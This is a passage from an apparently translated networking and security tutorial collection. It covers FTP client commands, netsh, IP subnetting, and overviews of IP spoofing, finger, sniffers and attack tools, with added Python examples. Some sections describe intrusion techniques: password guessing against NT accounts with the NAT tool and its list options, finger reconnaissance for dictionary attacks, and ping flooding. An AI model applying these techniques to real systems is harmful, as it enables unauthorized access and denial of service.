27. ls [remote-dir] [local-file] Displays the remote directory remote-dir and stores the listing in local-file.
28. macdef macro-name Defines a macro; the definition ends at the first blank line after macdef.
29. mdelete [remote-file] Deletes files on the remote host.
30. mdir remote-files local-file Like dir, but several remote files can be specified, e.g. mdir *.o *.zip outfile.
31. mget remote-files Transfers several remote files.
32. mkdir dir-name Creates a directory on the remote host.
33. mls remote-file local-file Like nlist, but several file names can be specified.
34. mode [mode-name] Sets the file transfer mode to mode-name; the default is stream mode.
35. modtime file-name Displays the last modification time of the remote file.
36. mput local-file Transfers several local files to the remote host.
37. newer file-name Retransfers the file if the modification time of file-name on the remote machine is more recent than that on the local hard drive.
38. nlist [remote-dir] [local-file] Displays the file list of the remote directory and stores it in local-file on the local hard drive.
39. nmap [inpattern outpattern] Sets the file-name mapping mechanism, so that certain characters in file names are converted during transfer, e.g. nmap $1.$2.$3 [$1,$2].[$2,$3]; when the file a1.a2.a3 is transferred, its name becomes a1,a2. This is especially suitable when the remote host is not a UNIX machine.
40. ntrans [inchars [outchars]] Sets the translation mechanism for file-name characters, e.g. after ntrans 1R the file name LLL becomes RRR.
41. open host [port] Establishes a connection to the specified FTP server, optionally on the specified port.
42. passive Enters passive transfer mode.
43. prompt Toggles interactive prompting during multiple-file transfers.
44. proxy ftp-cmd Executes an FTP command on a secondary control connection, which allows files to be transferred between two FTP servers. The first FTP command must be open, to establish the connection between the two servers first.
45. put local-file [remote-file] Transfers the local file local-file to the remote host.
46. pwd Displays the current working directory on the remote host.
47. quit Same as bye; exits the FTP session.
48. quote arg1, arg2 ... Sends the arguments verbatim to the remote FTP server, e.g. quote syst.
49. recv remote-file [local-file] Same as get.
50. reget remote-file [local-file] Like get, but if local-file exists, resumes the transfer from where it was interrupted.
51. rhelp [cmd-name] Requests help from the remote host.
52. rstatus [file-name] If no file name is given, displays the status of the remote host; otherwise displays the status of the file.
53. rename [from] [to] Renames a file on the remote host.
54. reset Clears the reply queue.
55. restart marker Restarts get or put from the specified marker, e.g. restart 130.
56. rmdir dir-name Deletes a directory on the remote host.
57. runique Sets unique local file-name storage: if the file already exists, a suffix is appended to the original name.
58. send local-file [remote-file] Same as put.
59. sendport Toggles use of the PORT command.
60. site arg1, arg2 ... Sends the arguments to the remote FTP host as a SITE command, e.g. site idle 7200.
61. size file-name Displays the size of the remote file.
62. status Displays the current FTP status.
63. struct [struct-name] Sets the file transfer structure to struct-name; the default is the stream structure.
64. sunique Sets unique remote file-name storage (the counterpart of runique).
65. system Displays the operating system type of the remote host.
66. tenex Sets the file transfer type for TENEX machines.
67. tick Toggles the byte counter during transfers.
68. trace Toggles packet tracing.
69. type [type-name] Sets the file transfer type to type-name; the default is ASCII, e.g. type binary sets the binary transfer mode.
70. umask [newmask] Sets the default umask of the remote server to newmask, e.g. umask 3.
71. user user-name [password] [account] Identifies yourself to the remote host; where a password is required it must be entered, e.g. user anonymous my@email.
72. verbose Same as the -v command-line parameter: sets detailed reporting, so that all responses from the FTP server are displayed to the user; the default is on.
73. ? [cmd] Same as help.
So how do you apply these commands to improve efficiency? Let me give an example of using FTP for a background download.
Assume your ISP provides you with a shell and you can use nohup, and you want to download a 30M program from ftp.download.com/pub/internet/. The specific steps are as follows:
1. Make a file with Notepad, say aaa1, with the following content:
open ftp.download.com
user anonymous zyz@cenpok.net
cd /pub/internet/
i
get aaa.zip
close
bye
2. Dial up and log in to your ISP. Log in to the shell with Telnet or NetTerm; usually you land in your home subdirectory, bbs ~/.
3. Upload aaa1 to your subdirectory on the ISP server with FTP.
4. Execute nohup ftp -invd < aaa1 > aaa2 & so that this process runs in the background on the ISP server. If you want to know how it is going, you can check. At this point you can disconnect or do something else; estimate the time (about 30M / ((33.6k / 9) s)), dial in again and more aaa2. If it shows that aaa.zip was downloaded successfully, aaa.zip is now on the ISP server and you can download it from there. Remember to del it after downloading it; if you waste the ISP's resources, your shell will be shut down.
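The batch command file and log check from the steps above, as an added example that is not the article's own code. It assumes `ftp -n` reads the commands from standard input, writes the file with owner-only permissions because it carries a password, and inspects a constructed `ftp -v`-style log; ftp.download.com, the e-mail password and the log text are sample values.

```python
"""Batch-mode ftp command file and log check for the background download above.

Added example, not the article's code. It builds the command file the article
describes (open / user / cd / get / close / bye) for `ftp -n`, writes it so that
only the owner can read it because it holds a password, removes it afterwards,
and checks the log written by `nohup ftp -invd < cmdfile > logfile &`.
ftp.download.com, the e-mail password and the log text are constructed samples.
"""
import os
import re
import tempfile


def build_ftp_commands(host, user, password, remote_dir, filename, binary=True):
    """Lines of the command file, in the order the article gives them."""
    lines = [f"open {host}",
             f"user {user} {password}"]   # needed because -n suppresses auto-login
    if binary:
        lines.append("binary")            # archives must not get ASCII conversion
    lines += [f"cd {remote_dir}", f"get {filename}", "close", "bye"]
    return lines


def write_ftp_script(lines, directory=None):
    """Write the command file with mode 0600 (mkstemp's default) and return its path."""
    fd, path = tempfile.mkstemp(prefix="ftpcmd-", dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return path


def script_permissions(path):
    """Permission bits of the command file; 0o600 means owner read/write only."""
    return os.stat(path).st_mode & 0o777


def remove_script(path):
    """The password must not stay on the shell host; returns True once it is gone."""
    if os.path.exists(path):
        os.remove(path)
    return not os.path.exists(path)


# FTP reply codes: 226 closes a successful transfer, 4xx/5xx are errors.
_DONE = re.compile(r"^226\b")
_ERROR = re.compile(r"^[45]\d\d\b")


def transfer_succeeded(log_text, filename):
    """True when the log shows the named file requested and then a 226 reply,
    with no 4xx/5xx error reply anywhere in the session."""
    requested = False
    completed = False
    for raw in log_text.splitlines():
        line = raw.strip()
        if _ERROR.match(line):
            return False
        if f"local: {filename}" in line or f"RETR {filename}" in line:
            requested = True
        elif _DONE.match(line) and requested:
            completed = True
    return completed


# Constructed logs in the style of `ftp -v` output (not captured from a real server).
SAMPLE_LOG_OK = """Connected to ftp.download.com.
220 FTP server ready.
331 Guest login ok, send your email address as password.
230 Guest login ok, access restrictions apply.
200 Type set to I.
250 CWD command successful.
local: aaa.zip remote: aaa.zip
200 PORT command successful.
150 Opening BINARY mode data connection for aaa.zip.
226 Transfer complete.
221 Goodbye.
"""

SAMPLE_LOG_FAIL = """Connected to ftp.download.com.
220 FTP server ready.
230 Guest login ok, access restrictions apply.
250 CWD command successful.
local: aaa.zip remote: aaa.zip
200 PORT command successful.
550 aaa.zip: No such file or directory.
221 Goodbye.
"""

if __name__ == "__main__":
    cmds = build_ftp_commands("ftp.download.com", "anonymous", "zyz@cenpok.net",
                              "/pub/internet", "aaa.zip")
    path = write_ftp_script(cmds)
    print(path, oct(script_permissions(path)))
    print("ok log:", transfer_succeeded(SAMPLE_LOG_OK, "aaa.zip"))
    print("failed log:", transfer_succeeded(SAMPLE_LOG_FAIL, "aaa.zip"))
    print("removed:", remove_script(path))
```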
----------------------------------------------------------------------
Author: Tiger Date: 2002-11-09 Content:
Microsoft's Windows family entered the network operating system market starting with Windows NT, and by now the network functions of Windows 2000 can be said to have gradually matured. In this process Windows has integrated the functions of many other network operating systems; you could say it borrowed them to become a complete network operating system, which is also why Sun and other companies are dissatisfied, feeling that Microsoft did not develop it entirely on its own. However, the functions of Windows 2000 are indeed very powerful, and like UNIX and Linux it can do a great deal of work at the command line. Let's look at a command that changes the IP address from the command line. After reading it, you may feel that this command resembles UNIX and Linux commands, and even more the commands of Cisco routers. Below is a transcript of what I actually did on my computer, with some comments added:
C:\> ipconfig (first use the ipconfig command to see the current IP address)
Windows 2000 IP Configuration
Ethernet adapter Local Connection:
    IP Address . . . . . . . : 192.168.0.250 (the local connection's IP before the change)
    Subnet Mask  . . . . . . : (value lost in extraction)
    Default Gateway  . . . . : 192.168.0.1
PPP adapter dial-up connection:
    IP Address . . . . . . . : 211.149.128.147
C:\> netsh (then run the netsh command)
netsh> interface (a subcommand of netsh)
interface> ip (a subcommand of the interface command)
interface ip> set (a subcommand of the interface ip command)
The following commands are available:
Commands in this context:
set address - Sets the IP address or default gateway of the specified interface.
set dns     - Sets DNS server mode and address.
set wins    - Sets WINS server mode and address.
interface ip> set address "Local Connection" static 192.168.0.2 255.255.255.0 192.168.0.1 1 (setting the IP address)
Ok.
(Note: doesn't the command above look just like a Cisco command?)
interface ip> exit
C:\> ipconfig (after the change, run ipconfig again to see the IP address and confirm that the change succeeded)
Windows 2000 IP Configuration
Ethernet adapter Local Connection:
    (IP address line lost in extraction)
    Subnet Mask  . . . . . . : 255.255.255.0
    Default Gateway  . . . . : 192.168.0.1
PPP adapter dial-up connection:
    IP Address . . . . . . . : 211.149.128.147
C:\>
netsh has many powerful features, as follows:
C:\> netsh
netsh> ?
The following commands are available:
Commands in this context:
..        - Moves up one context level.
?         - Displays a list of commands.
aaaa      - Changes to the `aaaa' context.
abort     - Discards changes made while in offline mode.
add       - Adds a configuration entry to a list of entries.
alias     - Adds an alias.
bye       - Exits the program.
commit    - Commits changes made while in offline mode.
delete    - Deletes a configuration entry from a list of entries.
dhcp      - Changes to the `dhcp' context.
dump      - Displays a configuration script.
exec      - Runs a script file.
exit      - Exits the program.
help      - Displays a list of commands.
interface - Changes to the `interface' context.
offline   - Sets the current mode to offline.
online    - Sets the current mode to online.
popd      - Pops a context from the stack.
pushd     - Pushes the current context onto the stack.
quit      - Exits the program.
ras       - Changes to the `ras' context.
routing   - Changes to the `routing' context.
set       - Updates configuration settings.
show      - Displays information.
unalias   - Deletes an alias.
wins      - Changes to the `wins' context.
The following sub-contexts are available:
 routing interface ras dhcp wins aaaa
To see help for a command, type the command followed by ?.
----------------------------------------------------------------------
Author: Tiger Date: 2002-11-09 Content:
● IP addresses
On the Internet every host has a unique address, and a gateway often has more than one. An address consists of two parts, the network number and the host number; the combination is unique, so that each IP address represents a unique host on the Internet. All IP addresses are 32 bits long. IP addresses are divided into five classes, of which three are commonly used: class A, class B and class C. Their formats are as follows:
Address type    Address form
A               n.h.h.h
B               n.n.h.h
C               n.n.n.h
Here n is the network number and h the host number; n and h are integers greater than 0 and less than 256. Since the first bit of a class A address is 0 and marks it as class A, class A addresses can only represent 1 to 126 networks, each with 16,000,000 hosts; 0 and 127 have special uses. The highest bits of the first byte of class B and class C addresses mark the address as B or C, so the first byte of a class B address ranges from 128 to 191, and that of a class C address from 192 to 222. Class B addresses can therefore represent 64x256 (16,382) networks, each with 64,000 hosts, while there are more than two million class C networks, each with up to 254 hosts. Class D addresses are called multicast addresses: hosts are grouped, and a packet sent to a multicast address is received by all hosts in the same group. In our country, IP addresses are assigned by the Academy Network Center and the institutions it authorizes.
● What is a "subnet"
If a network contains a great many hosts, management becomes difficult and the network configuration becomes complicated and error-prone. In many cases the network number of a class A or class B address corresponds to far more hosts than one organization or unit actually uses. On the other hand, the 254 host numbers of a class C address are too few. To fit the actual situation, a larger network is often divided into several parts, each of which is called a subnet. From the outside, these subnets still correspond to one complete network number. The approach is to divide the host-number part of the address into two parts: a subnet number and a host number.
For example, 159.226.xxx.xxx is a class B address. The range 159.226.21.xxx belongs to the Institute of Automation of the Chinese Academy of Sciences, 159.226.40.xxx is the China Computing Center, and 159.226.41.xxx is the National Intelligent Center. It can be seen that the third byte of this class B address has become the subnet number, and the last byte identifies the different hosts. Of course this is just an example; some units may subdivide further, so that the third byte together with the top bits of the fourth byte forms the subnet number, leaving only 64 hosts in each subnet. To see your own subnet, Win9x users can run winipcfg.
● How to know the network mask
When two machines on the Internet communicate, the two hosts' IP addresses are needed to determine whether they are in the same subnet. If so, the packet can be sent directly to the host; if not, it has to be handed to the gateway. This is solved by setting the correct network mask. The network mask is a bit string in which the positions corresponding to the network number and subnet number are 1 and the host-number part is 0. You can look at your own network number, network mask and so on; take this example:
$ ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
        inet 127.0.0.1 netmask ff000000
le0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST> mtu 1500
        inet 159.226.21.7 netmask ffffffc0 broadcast 159.226.21.191
From this you can see that le0 is configured with a class B address, its IP address is 159.226.21.7, and the network mask of this class B address is ffffffc0, i.e. the third byte and the top bits of the fourth byte form the subnet number. Some IP addresses are reserved:
◇ The IP address 0.0.0.0 is used when the host boots and is not used afterwards. An IP address whose network number is 0 refers to a host on the same network.
◇ A correct network number with a host-number part of all 1s broadcasts to all hosts on the network with that network number.
◇ A host-number part of all 1s is the IP address for broadcast within this network segment.
◇ A packet sent to the address 127.0.0.1 is immediately placed in the local input queue; this is often used to debug network software.
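The network-mask arithmetic described in this section and the subnet section before it, as an added example that is not part of the original article. It uses the standard class boundaries and the addresses quoted in the text (the class B block 159.226.x.x and the ifconfig line for le0); 159.226.21.60 and 159.226.21.100 are constructed sample hosts.

```python
"""Classful address and subnet-mask arithmetic for the addresses discussed above.

Added example, not part of the original article. It uses the standard class
boundaries (A 1-126, B 128-191, C 192-223) and the values quoted in the text:
the class B block 159.226.x.x, its /24 subnets, and the ifconfig line
"inet 159.226.21.7 netmask ffffffc0". 159.226.21.60 and 159.226.21.100 are
constructed sample hosts.
"""
import ipaddress

ALL_ONES = 0xFFFFFFFF


def ip_to_int(dotted):
    """'159.226.21.7' -> 32-bit integer (raises ValueError on bad input)."""
    return int(ipaddress.IPv4Address(dotted))


def int_to_ip(value):
    return str(ipaddress.IPv4Address(value))


def address_class(dotted):
    """Classful category decided by the leading bits of the first byte."""
    first = ip_to_int(dotted) >> 24
    if first in (0, 127):
        return "reserved"      # 0 and 127 have special uses (see text)
    if first < 128:
        return "A"             # leading bit 0
    if first < 192:
        return "B"             # leading bits 10
    if first < 224:
        return "C"             # leading bits 110
    if first < 240:
        return "D"             # multicast
    return "E"


def parse_netmask(mask):
    """Accept dotted (255.255.255.192), hex as ifconfig prints it (ffffffc0)
    or prefix notation (/26). Rejects masks whose 1 bits are not contiguous."""
    if mask.startswith("/"):
        bits = int(mask[1:])
        if not 0 <= bits <= 32:
            raise ValueError(f"bad prefix length {mask}")
        value = (ALL_ONES << (32 - bits)) & ALL_ONES
    elif "." in mask:
        value = ip_to_int(mask)
    else:
        value = int(mask, 16)
        if not 0 <= value <= ALL_ONES:
            raise ValueError(f"bad hex mask {mask}")
    # A valid mask is a run of 1s followed by 0s: its complement is 2^k - 1.
    host_bits = (~value) & ALL_ONES
    if host_bits & (host_bits + 1):
        raise ValueError(f"non-contiguous netmask {mask}")
    return value


def prefix_length(mask_int):
    return bin(mask_int).count("1")


def split_address(dotted, mask):
    """Network number, host number and broadcast address under the given mask."""
    m = parse_netmask(mask)
    ip = ip_to_int(dotted)
    network = ip & m
    host_bits = (~m) & ALL_ONES
    return {
        "network": int_to_ip(network),
        "host_number": ip & host_bits,
        "broadcast": int_to_ip(network | host_bits),   # host part all 1s
        "prefix": prefix_length(m),
    }


def same_subnet(a, b, mask):
    """The check a host makes before sending: deliver directly, or via the gateway?"""
    m = parse_netmask(mask)
    return (ip_to_int(a) & m) == (ip_to_int(b) & m)


def subnet_bits(dotted, mask):
    """How many bits of the classful host part were borrowed for the subnet number."""
    base = {"A": 8, "B": 16, "C": 24}.get(address_class(dotted))
    if base is None:
        return None
    return prefix_length(parse_netmask(mask)) - base


if __name__ == "__main__":
    print(address_class("159.226.21.7"), split_address("159.226.21.7", "ffffffc0"))
    print(same_subnet("159.226.21.7", "159.226.21.100", "ffffffc0"))
    print(subnet_bits("159.226.21.7", "ffffffc0"))
```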
Now do you understand the network mask? ~*~
● How to understand IP!
I think that while on the Internet you will often run into, or hear about, attacks involving IP addresses, so how should we understand an IP being "stolen"? Often it is because there are not enough IP addresses, or because someone wants to hide their own identity when attacking other people's machines (I think the latter accounts for the larger share), that people impersonate an IP. In fact, to impersonate a host's IP you can use a raw socket to send IP packets; the condition is that you must have superuser privileges, but this kind generally receives no response, because the gateway will not forward those packets into this network segment. Thinking about it, it is relatively simple and convenient to impersonate the IP of a host in your own network segment. If you are a Windows user, you can just change the IP address and mask; under UNIX it is more troublesome and you need to program it (if you succeed, you can forge many kinds of IP-protocol packets and greatly disturb the order of the network). The effect of an impersonated IP is that two machines have the same IP. When both machines are up, the system reports an IP conflict; normally whoever used the IP first keeps using it. But if Windows and UNIX "fight", Windows loses, even if Windows booted first... So how is IP impersonation actually done? In fact this can be found on many sites, and it is inconvenient to explain further here.
● Overview of IP spoofing attacks!
An intruder generally creates packets with a spoofed source IP address in order to access a remote machine. The method exploits applications that authenticate on the basis of the IP address, and may result in unauthorized access, even root access, to the target system. This kind of attack can succeed even if the return packets never reach the intruder. Of course, whether it can be done in any given case depends mainly on the configuration of the target machine, for example: a) a machine with several internal interfaces supporting external networks; b) an internal network with subnets and routers that have two network interfaces; c) a firewall that uses source-IP-address authentication. These three points illustrate the configurations this attack method targets. If you open Telnet for the convenience of Internet users, then, as with other services, there is a good side and an unsafe side. Among the services more susceptible to IP spoofing attacks are a) SunRPC & NFS; b) X Windows; c) the BSD UNIX "r" commands. As for how to check whether such IP spoofing has occurred, there are many ways; one is this: the examiner can compare the process accounting logs between different systems on the internal network. Once a system has been attacked, a log entry on the attacked system will show the corresponding remote access, while on the source machine there will be no corresponding initiating record (note: ordinary intruders know how to modify these log entries). The best way to counter IP spoofing is to install a filtering router that does not allow packets carrying internal network addresses to pass through from outside. In addition, the source addresses of outgoing packets should be checked against the internal address range, which can prevent IP spoofing attacks launched from inside the network. Of course nothing is universal, and one should not depend entirely on this.
● Other protocols of the IP layer! Whether you simply like networking or care about network security, you cannot do without knowing the other protocols of the IP layer.
ICMP (Internet Control Message Protocol) is used to transmit control information about the network and hosts, such as that a target host is unreachable, route redirection, or whether the target host is up. The common "ping" command uses the ICMP protocol: ping sends an echo request to the target host, and the echo reply is the target host's answer to the sender. Many network attack tools are implemented with this protocol. ARP (Address Resolution Protocol) is used to map an IP address to the corresponding host MAC address. When two hosts on a local area network communicate, the physical address of the target host is usually needed. Executing the arp command shows some of the correspondences between IP addresses and physical addresses.
RARP (Reverse Address Resolution Protocol) is used to map a physical address to a 32-bit IP address. This protocol is mostly used for diskless workstations, because a diskless workstation knows only its own physical address and needs the RARP protocol to obtain an IP address.
● Telnet (remote login)
Telnet is the Internet standard for remote terminal access. It faithfully imitates a remote terminal but has no graphical capability; you only get a character interface. Telnet allows legitimate users to access any remote site, and requires no special agreement. Telnet is not a secure service: because the information Telnet sends is in the clear, it is easy to eavesdrop on the network. Telnet is relatively secure only when the remote machine and the network communication between it and the local site are secure. This shows that the Telnet service on the Internet is unsafe. There are now secure login client programs, but not many, mainly because using such a program requires a corresponding server program on the server side. Besides Telnet, there is also a set of programs such as rlogin, rsh and on that can be used for remote terminal access and for executing programs. These programs allow a user to log in remotely without entering a password again; that is, the remote host trusts that the host the user logged in from has already authenticated the user by user name and password. But using these r commands is extremely unsafe; they are easily attacked by IP spoofing, name spoofing and other kinds of fraud. In general this trust mode is not suitable for use on the Internet. In fact, because address-based trust is so unsafe, do not believe a packet just because of which host it says it comes from. Using rlogin and rsh within a network protected by a firewall depends on the security measures inside the network. However, on relies on the client host program to perform the security check, and anyone can bypass the check on the client side, so on is unsafe even in a LAN protected by a firewall (it can let anyone run anything as any user with any parameters). Many hosts have disabled the rexd server, which makes on ineffective.
● Anonymous FTP service. With anonymous FTP, users can log in to an FTP server anonymously. When logging in, the user is asked to supply a complete e-mail address as the password. In fact this requirement is largely fictional on many sites: anything containing an @ that looks like an e-mail address is accepted, and the host does no password check at all. When the host running the FTP service handles an anonymous user, it generally executes a chroot command so that the anonymous user can only enter the anonymous FTP area the host allows. However, to support both anonymous FTP and user FTP the FTP server must be able to access all files, which shows that the FTP server does not always run inside the chroot environment. This leaves a hole that some careless administrators do not know they have left open, and it is easy for a hacker to obtain whatever permissions an anonymous FTP user can get. The usual way to solve this is to modify inetd so that, instead of starting the FTP server directly, it executes chroot (or a program like chrootuid) and only then starts the server. In general FTP access is limited to the anonymous user, the anonymous user has only its normal permissions, and performing chroot before the server starts means the anonymous user is confined. (Note: many FTP servers do this only for their anonymous FTP area; this is mentioned briefly in the vendor's manual, and such manuals rarely discuss the vulnerabilities or how to block them. Carelessness here is absolutely fatal.) If an anonymous user can get at a file in the anonymous area of the FTP server that is not meant for anonymous users, then internal material has probably been placed in the anonymous FTP area. In many network attacks the passwd password file can be read this way. That is a failing of the administrator.
● Querying network member information. Finger service: Finger can query personal information about users who have accounts on the target host, whether or not the user is currently logged in. The information Finger generally returns includes the login name, when and from where the user last logged in, and the user's profile. The finger command can be used in three ways: * finger @host lists information about every user currently logged in on the target host; * finger user@host lists that user's information on the host; * finger str@host, when you do not know the user name, returns the user names or real names of all users that contain the string str. In practice Finger very often gives a hacker a lot of useful information, such as user names and user details, which is a great help when running a dictionary attack. Nowadays most hosts have cancelled this service, keep it only on the internal network, block finger requests, or return only a little information. Pay special attention to the version of the finger program: GNU Finger V1.37 lets a finger request fetch any file on the system, including ... Another host information query, the WHOIS service: WHOIS is similar to finger, but the information it returns is about hosts, networks, domains and their administrators. By default the whois client queries the Network Information Center, rs.internic.net, which holds Internet domain and administrator information. Some sites use the WHOIS protocol to write server programs that publish user information, trimmed according to the host's own situation, but what remains is often still important to a hacker.
● Name service. Converting between the host names people use and the addresses machines use is the job of the name service. In the early Internet every site on the network kept a host list giving the name of each machine and its IP address. Later, as the number of hosts grew, this became unrealistic and hard to maintain, because the list grew larger than anyone imagined, and when other machines changed their names or addresses the host lists could not be updated in time. Because of this, the Internet introduced the domain name service, DNS, to replace it. DNS lets each site keep its own host information and also query information about other sites. DNS is essentially a user-level service, but it is the foundation of FTP, SMTP, Telnet and every other service that may use it. I think most people prefer to use a name rather than an IP address. Moreover, many anonymous FTP servers require a double check that name and address match, otherwise you will not be allowed to log in from your machine to the FTP server. Generally an enterprise network must use and provide name service so that it can be conveniently connected to the Internet. But providing DNS service may leak information about the internal machines of the enterprise network. The DNS database files often contain host information records; if they are not protected it is easy for outsiders to get them, and they readily give a hacker information useful for an attack (such as the operating system a machine runs). Internally, using DNS and relying on host names means a host cannot resist an intruder who sets up a fake DNS server.
At the same time, the facts also show that a safer service must authenticate automatically in order to prevent name spoofing, and must authenticate the user name rather than the host name; relying on the IP address is not a reliable way to prevent IP spoofing and is not fully safe. ● Time service. NTP, the Network Time Protocol, is an Internet service that can set the host system's clock very accurately. In many cases it is important that different machines have synchronized time (most authentication technology in DCE now depends on time synchronization). There is a kind of replay attack that records an interaction and then runs it again; synchronized clocks can prevent this intrusion (by the timestamp in the record).
● Protocol layers. TCP and UDP correspond to the transport layer of the OSI reference model. Two protocols are defined at this layer. One is TCP, the Transmission Control Protocol, a reliable, connection-oriented protocol that allows error-free transmission of information between two hosts on the Internet. It takes a long byte stream and passes it to the network layer in order. At the target host the TCP receiving process reassembles the received data in the form the source host's TCP layer sent it and hands it to the application layer. TCP also performs flow control to avoid sending too fast, so that a slower host is not congested by too much data arriving at once. All of this is entirely transparent, and ordinary users need not pay attention to these underlying TCP/IP details. In network transmission the concept of a "connection" is used to guarantee correct, ordered delivery over the network. A TCP connection means that three signals are exchanged before data is transmitted, so that both parties are prepared for data. The two hosts start transmitting data after these three handshake signals. Each packet sent carries a sequence number, and the receiving host sends the sending host an acknowledgement for each packet it receives. If a packet is corrupted or lost on the channel, the sending host retransmits it. When the transfer ends, the two hosts release the connection together. The other protocol, UDP, is connectionless: when you have data you simply send it. Whether the data reaches the target without error is not guaranteed, and the receiver does not tell the sender whether it arrived correctly, so this kind of transfer is unreliable. Each of the two has advantages and disadvantages.
The connection-oriented approach is reliable, but a lot of information unrelated to the data itself is transmitted during communication, which greatly reduces channel utilization, so connections are normally used for applications that need relatively high data reliability. The connectionless approach is unreliable, but it does not transmit information unrelated to the data itself, so it is fast. It is often used for real-time services, or for applications that are insensitive to errors, such as sound, images and the like. ● NET. An external command that can be used to control NetBIOS network resources; it provides almost all NetBIOS network functions. I can only list its subcommands, you can try them yourself: accounts, computer, print, send, name, use, user, view, pause, localgroup, share, config, file, continue, group, help, stop, start, time, session, statistics ........ ● NETSTAT. An external command used to display current TCP/IP connections and their status. Entering the /? parameter shows its command options. If you want to monitor continuously, you can give an interval so that the display refreshes automatically at that interval (for example, netstat -a 5 displays all TCP/IP connections, including the ports servers are listening on, every 5 seconds); to stop it, press CTRL-BREAK. . . . . .
● ping (bullets.. hahaha). An external command that sends ICMP packets to a remote system to determine whether that system can be reached and can be further used for TCP/IP services (or you can look at the result after you have blasted it, ~ - ~ ~). Using ping to probe whether a host is still up is so common in TCP/IP that "Did you ping the server?" is used as a verb. Entering the command with no parameters shows its options. A simple ping can tell whether a target is working abnormally, but if you can run ping against a remote machine successfully, the physical layer, data link layer and all functions of the network layer are working correctly, so communication problems are generally at a higher layer. A hacker can use ping to attack a network, for example by sending a large number of ping packets (bullets) so that the target is flooded with useless data. One machine alone has little effect, but if many machines send this at the same time, then ..., this is also a denial of service attack, and it can make the remote system's TCP/IP stack crash. NT is the most sensitive to this attack ... ● Telnet (remote login). I will not say much. But I do want to point out that many routers, switches and firewalls can be configured through it via their IP address, and of course they can be configured by hackers too; hackers can connect to the IP address through the Telnet port. You can also block internal Telnet connections through the firewall ...
● tracert can be used to display the routers between two communicating Internet hosts. Since most servers use meaningful names on their router interfaces, it is usually possible to infer something about the relationship between the two hosts. . . . . .
● Netalert. This is an older tool and not widely used, but I still find it very useful. It can be used to monitor the status of a target's TCP/IP services: it polls at a set interval, and when a port changes from open to closed or from closed to open it sends you an e-mail to let you know. But it needs the mail program Blat 1.2 or later for the e-mail function. . . . .
● NAT (NetBIOS Auditing Tool). Strictly speaking this is a NetBIOS security auditing or monitoring tool; its essential purpose is to reveal security defects in a NetBIOS network, and it is quite practical, although there are many tools for this now. One of its features is automatic password checking, which for hackers ... huh, huh. With it you can automatically run an attack against an NT server (apparently it works on Unix too): it tries account and password combinations repeatedly, attempting to connect through NetBIOS (which would allow the remote machine's drives to be mapped). It accepts an account list and a password list and then tries each account and password in the order they appear ... It takes three command parameters: -o (specify a log file for redirected output), -u (specify a text file of accounts), -p (specify a text file of passwords to try for each account). But there are now many ways to block a NAT attack, such as renaming the Administrator account and restricting the Administrator account from logging in over the network, and so on. . . . .
● Ethernet sniffers. A sniffer is one of today's ways of breaking in. Although computers on a network share the channel, a computer generally accepts only packets whose destination address in the packet header matches its own network address, and does not accept packets travelling on the wire that are addressed to other computers. The exception is broadcast packets, whose destination in the header is all 0s or all 1s, so every computer on the network reads them. But if a machine can accept all traffic, regardless of whom it is addressed to, that machine can be called a sniffer. It may be used by the system administrator to manage the network, but most of the time it is used by hackers to invade machines. Since accounts and passwords are transmitted in plain text over the Ethernet, if a hacker has a way to control a sniffer, every machine on the network is in danger. . ● How to know whether you are being eavesdropped on. Eavesdropping may be done with dedicated hardware, or by running eavesdropping software. First you should carefully check every connection along the physical wiring of the network. After ruling out hardware, the next step is to detect whether eavesdropping software is running. When an eavesdropping program runs, the network interface of the eavesdropping computer is switched into promiscuous mode, which is how it can capture all packets. Under SunOS, NetBSD and other BSD-based UNIX systems, run the "ifconfig -a" command; it tells you all the interfaces on the machine and whether any of them is in the dangerous promiscuous mode. DEC OSF/1 and IRIX are not so convenient: you have to specify which interface to check. In that case you can run netstat -r to see how many interfaces there are; having found an interface, use ifconfig le0 to check it ... (Experienced intruders generally replace the "ifconfig" command to escape detection. In that case you can use some tools, such as cpm, which can automatically check the interfaces; it runs under the SunOS operating system.)
Some eavesdropping programs, when run, copy packets transmitted on the network by accessing the packet device and store them on the network host, forming a file that keeps growing over time. This file is usually large, and on a busy network it will be even larger. There is a tool called lsof (List Open Files) that can find these growing files and can find programs that are accessing the packet device, which in SunOS is /dev/nit.
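As an added example (not from the original article), the following Python script applies the ifconfig -a check described above to captured interface listings: it reports every interface whose flags include PROMISC, understands both the SunOS/BSD `flags=...<...>` style and Linux `ip -o link` output, and also decodes the numeric flags word Linux exposes in /sys/class/net/<if>/flags. The two listings embedded in it are constructed samples, not output from a real host.

```python
"""Spot interfaces left in promiscuous mode, the tell-tale of a software sniffer.

Added example, not part of the original article. It parses interface listings
of the kind `ifconfig -a` (SunOS/BSD/modern net-tools) and `ip -o link` (Linux)
print, and decodes the numeric flags word from /sys/class/net/<if>/flags.
"""
import re
import shutil
import subprocess

# IFF_PROMISC from <net/if.h>: bit 8 of the interface flags word on Linux.
IFF_PROMISC = 0x100

# Constructed sample of `ifconfig -a` on a SunOS-style host; le0 is sniffing.
SAMPLE_IFCONFIG = """\
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
        inet 127.0.0.1 netmask ff000000
le0: flags=963<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST> mtu 1500
        inet 192.0.2.10 netmask ffffff00 broadcast 192.0.2.255
le1: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST> mtu 1500
        inet 198.51.100.7 netmask ffffff00 broadcast 198.51.100.255
"""

# Constructed sample of `ip -o link` on a Linux host; eth1 is sniffing.
SAMPLE_IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
3: eth1: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
"""

# Header line of one interface: optional "N: " index, the name, then a "<FLAG,FLAG,...>" list.
_HEADER_RE = re.compile(r"^(?:\d+:\s+)?(?P<name>[^\s:]+):?\s.*?<(?P<flags>[^>]*)>")


def promiscuous_interfaces(listing: str) -> list:
    """Return the names of interfaces whose flag list contains PROMISC.

    Continuation lines (inet, ether, netmask, ...) are indented, so only
    lines starting in column 0 are treated as interface headers.
    """
    found = []
    for line in listing.splitlines():
        if not line or line[0].isspace():
            continue
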